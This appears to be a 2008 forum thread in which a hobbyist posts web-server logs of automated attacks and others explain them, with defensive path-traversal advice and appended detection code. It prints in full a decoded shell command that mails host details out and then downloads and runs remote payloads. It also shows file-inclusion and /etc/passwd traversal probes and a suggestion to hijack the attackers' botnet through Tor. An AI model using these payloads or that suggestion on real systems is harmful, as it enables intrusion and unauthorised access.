Author | Message | Time |
---|---|---|
Ringo | So, I wrote some little vb6 web server a while back to convert binary data to html pages for d2 players to view, but I noticed today I had the following requests, and am just wondering if anyone knows what they are trying to do? lol [quote] [01:14:00] [Client 0] Querying: \cacti\cmd.php [05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\ 2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR (32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101, 116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109, 112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99, 97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46, 50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109, 59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32, 47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116, 59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32, 45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46, 47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111 [05:41:13] Connection From 69.42.162.18:18613 [05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log [/quote] What are they trying to do? hax it? Sry if this is wrong forum, just interested to know what they think they are going to accomplish. edit: Just converted those mumbo jumbo chars to a string and got the following: [code] /sbin/ifconfig \| grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out; cat /tmp/out \| mail -s XX.X.XX.XXX hacked alexaaa89@yahoo.com;wget www.alexutz.as.ro/t -O /tmp/t; chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log [/code] Lol. Aside: XX.X.XX.XXX was my IP. [Kp edit: broke up the command line. It broke the table.] | February 6, 2008, 6:22 AM |
Barabajagal | You should send them an E-Mail telling them to try again, but this time do it right. | February 6, 2008, 7:09 AM |
Ringo | lol Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log? I get the gist they were trying to get my server to email them on success, but I have almost no exp with web server software (hence I wrote my own), but surely it can't be that easy to hax a site? All they got from me was "Page can not be found" heh | February 6, 2008, 6:57 PM |
iago | That looks like a totally automated attack, unless you actually have "cmd.php"... probably somebody scanning random IP ranges. | February 6, 2008, 7:17 PM |
Ringo | ah, Cool, nothing to worry about then. (nah I don't have any php files, idk any php) They also tried it the day before I think, because I forgot to add error handling for opening files, because my server crashed with the run time error "bad file number or name" :( thx for info | February 6, 2008, 7:34 PM |
Kp | I concur, that looks automated. It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address. It would then download additional code using wget and execute that. That command line requires tools that are standard on Unix systems, but they're not standard on Windows. The content of that suntzu.log would be whatever was printed by the Perl script. Someone would have to download the script and examine it to find out what it prints. As an aside, whoever wrote that wasn't very good. There's no need to create so many temporary files. | February 7, 2008, 12:21 AM |
Ringo | Ah ::) Too bad for them I guess, that sounds kinda lame :'( Thx for info, at least I know what they were up to now :P I'm gonna put some funny text for them in \cacti\cmd.php just in case they do it again. | February 7, 2008, 2:06 AM |
mynameistmp | If you want to know more, I'd suggest connecting to this ircd: [quote] my @adms=("`aleXutz"); my @canais=("#FreeForAll") $servidor='irc.iceman.ro' unless $servidor; my $porta='9999'; [/quote] Odds are pretty good that you could commandeer the entire botnet. | February 7, 2008, 3:45 AM |
iago | [quote author=mynameistmp link=topic=17300.msg176179#msg176179 date=1202355947] If you want to know more, I'd suggest connecting to this ircd: [quote] my @adms=("`aleXutz"); my @canais=("#FreeForAll") $servidor='irc.iceman.ro' unless $servidor; my $porta='9999'; [/quote] Odds are pretty good that you could commandeer the entire botnet. [/quote] You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor). | February 10, 2008, 7:58 AM |
Newby | Mmm, tmp is awesome. :) | February 11, 2008, 5:03 AM |
Ringo | Hm, I got another strange one today (seem to get this one a lot) [code] [09:04:11] Connection From 67.19.246.130:29261 [09:04:11] Item Drop Rate Pages Updated In 32ms [09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg [09:04:11] [Client 1] Connection Closed. [/code] I'm guessing this one is automated as well, and is some kind of configuration file? Would it be wise for me to IP ban clients that request files from \cacti\ and \cgi-bin\? I was a little worried one day someone would request \Project1.vbp :P (so I moved the source code) | February 11, 2008, 9:23 AM |
Newby | [quote author=Ringo link=topic=17300.msg176291#msg176291 date=1202721792] I was a little worried one day someone would request \Project1.vbp :P (so I moved the source code) [/quote] I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe" | February 11, 2008, 9:58 PM |
Ringo | [quote author=Newby link=topic=17300.msg176310#msg176310 date=1202767084] [quote author=Ringo link=topic=17300.msg176291#msg176291 date=1202721792] I was a little worried one day someone would request \Project1.vbp :P (so I moved the source code) [/quote] Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe" [/quote] Haha, I just tried with iexplore and got: [code][22:11:38] [Client 0] Querying: \test.txt[/code] Then tried it from a program I was using to open pages to view html with, and got: [code][22:26:30] [Client 0] Querying: \..\test.txt[/code] and in the requesting program: [code] [22:26:30] HTTP/1.1 200 OK Date: Mon, 11 Feb 2008 22:26:30 Content-Length: 24 Connection: close Content-Type: text/plain; charset=UTF-8 OMFG this is a test LOL [/code] So, yeah, you could have back pathed to that file :D Not any more tho. :) I was wondering the other day if it's possible to back path, wow lol. Thanks for bringing that to my attention :P Is there any other way to back path like that? | February 11, 2008, 10:37 PM |
iago | If you're removing ../, make sure you also pick up the unicode variations and malformed versions (i.e., does .%00./ work? Does ...///../// work? Does ..%ff/ work?). There have been countless problems like that plaguing IIS over the years. | February 11, 2008, 11:34 PM |
Ringo | ooch, thanks. Atm I'm just nerfing it like this: [code] strFilePath = Replace(strFilePath, "/", "\") strFilePath = Replace(strFilePath, "..", "") strFilePath = Replace(strFilePath, "\\", "\") If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then Call SendWebPage(App.Path & "\Error.html") Exit Sub ElseIf IsValidFile(strFilePath) = False Then Call SendWebPage(App.Path & "\Error.html") Exit Sub End If [/code] IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one). I'm guessing it would be a good idea, next time my cpu is idle, to brute force the dir() function and log any successful backpathing? | February 12, 2008, 12:58 AM |
iago | If you're playing around, don't forget encodings -- Unicode, UTF-8, invalid UTF-8, stuff like that. I suggest writing an IsSubdirOf() function that makes sure you end up in the proper folder. | February 12, 2008, 1:28 AM |
Ringo | lol, I think someone hates me :P [code] [02:23:49] Connection From 207.150.178.18:8769 [02:23:50] [Client 0] Querying: \index.php? page=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:00] [Client 0] Querying: \wp-content\plugins\pictpress\resize.php? size=..\..\..\..\..\..\..\..\..\..\&path=\etc\passwd%00 [02:24:11] [Client 0] Querying: \tellmatic\include\Classes.inc.php? tm_includepath=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:22] [Client 0] Querying: \includes\functions_mod_user.php? phpbb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:33] [Client 0] Querying: \wp-content\plugins\BackUp\Archive\Predicate.php? bkpwp_plugin_path= [02:24:44] [Client 0] Querying: \classes\core\language.php? rootdir=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:24:55] [Client 0] Querying: \components\com_smf\smf.php? mosConfig_absolute_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:25:06] [Client 0] Querying: \vbgsitemap\vbgsitemap-config.php? base=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?& [02:25:17] [Client 0] Querying: \public_html\modules\Forums\favorites.php? nuke_bb_root_path=http:\\www.cleverworldnet.com\~ikea\cgi.jpg?&[/code] | February 15, 2008, 2:44 AM |
Explicit[nK] | Trying to traverse your directories... lol. | February 15, 2008, 6:26 AM |
iago | Yeah, I tend to see automated scans daily. I've just started to ignore them. :) | February 15, 2008, 2:22 PM |
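The IsSubdirOf() check iago suggests, written out as an added Python example (not the thread's VB6 server code): instead of stripping ".." substrings, decode the request, refuse NUL bytes and invalid UTF-8, resolve the path against the document root, and only then decide whether it stayed inside. The document root `/srv/d2html` is a constructed placeholder for the thread's App.Path.

```python
import os
from urllib.parse import unquote_to_bytes

# Constructed document root for this example; the thread's server used App.Path.
DOC_ROOT = os.path.abspath("/srv/d2html")

def resolve_request_path(raw_path, doc_root=DOC_ROOT):
    """Map a requested URL path onto a file under doc_root.

    Returns the absolute local path, or None if the request must be refused.
    The decision is made on the *resolved* path, so it covers '..', '.%00.',
    '...///..', '..%ff' and any other spelling that substring stripping misses.
    """
    # 1. Percent-decode to raw bytes, twice, so a double-encoded sequence
    #    such as %252e does not survive a single pass.
    decoded = unquote_to_bytes(unquote_to_bytes(raw_path))
    # 2. A NUL byte would truncate the name in a C runtime: refuse it outright.
    if b"\x00" in decoded:
        return None
    # 3. Require valid UTF-8; bytes such as %ff are refused, never guessed at.
    try:
        text = decoded.decode("utf-8")
    except UnicodeDecodeError:
        return None
    # 4. Treat backslash like slash (Windows server) and drop the leading
    #    separator so the path joins under doc_root, not at the drive root.
    text = text.replace("\\", "/").lstrip("/")
    # 5. Resolve and compare against the canonical root: the only test that
    #    matters is where the final path lands.
    root = os.path.normpath(doc_root)
    candidate = os.path.normpath(os.path.join(root, text))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate

def is_subdir_of(raw_path, doc_root=DOC_ROOT):
    """The IsSubdirOf() check: True only when the request stays inside doc_root."""
    return resolve_request_path(raw_path, doc_root) is not None
```

os.path.normpath does not follow symbolic links; if the document root can contain links, apply os.path.realpath to both sides before the comparison.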
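On Ringo's question of whether to flag clients by what they request: an added Python example (not from the thread) that runs a few rules over lines in the server's own "[time] [Client N] Querying: path" log format, picking out traversal sequences, NUL bytes, remote-URL include parameters and the UNION/**/SELECT shape seen in the cacti probe. The log lines are constructed to match the thread's format and the remote host is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed lines in the format the thread's server logs (not real traffic);
# the remote host is a placeholder.
SAMPLE_LOG = """\
[09:04:11] [Client 1] Querying: \\cgi-bin\\firmwarecfg
[02:24:00] [Client 0] Querying: \\wp-content\\plugins\\pictpress\\resize.php?size=..\\..\\..\\&path=\\etc\\passwd%00
[02:24:11] [Client 0] Querying: \\tellmatic\\include\\Classes.inc.php?tm_includepath=http:\\\\example.invalid\\cgi.jpg?&
[05:40:40] [Client 0] Querying: \\cacti\\cmd.php?1+1111)\\**\\UNION\\**\\SELECT\\**\\2,0,1\\**\\FROM\\**\\host
[22:11:38] [Client 0] Querying: \\test.txt
"""

LOG_RE = re.compile(r"^\[(\d\d:\d\d:\d\d)\] \[Client (\d+)\] Querying: (.*)$")

def classify_request(path):
    """Return the reasons (possibly none) a request looks like scanner traffic."""
    reasons = []
    # Decode %-escapes and fold the server's backslashes to '/' first, so each
    # pattern below sees one spelling of a sequence.
    p = unquote(path).replace("\\", "/")
    if "\x00" in p:
        reasons.append("nul-byte")
    if re.search(r"(^|/)\.\.(/|$)", p):
        reasons.append("traversal")
    # A parameter whose value is itself a URL: remote file inclusion probe.
    if re.search(r"[?&][^=&]+=(https?|ftp):/", p, re.I):
        reasons.append("remote-include")
    # /**/ comment tokens stand in for spaces to dodge naive filters; collapse
    # them before looking for the UNION ... SELECT shape.
    sql = re.sub(r"/\*.*?\*/", " ", p)
    if re.search(r"\bUNION\b.*\bSELECT\b", sql, re.I):
        reasons.append("sql-union")
    if re.match(r"/?(cacti|cgi-bin)/", p, re.I):
        reasons.append("known-probe-path")
    return reasons

def scan_log(text):
    """Return (client, path, reasons) for every log line that trips a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:          # e.g. 'Connection From ...' lines are not requests
            continue
        _, client, path = m.groups()
        reasons = classify_request(path)
        if reasons:
            hits.append((client, path, reasons))
    return hits
```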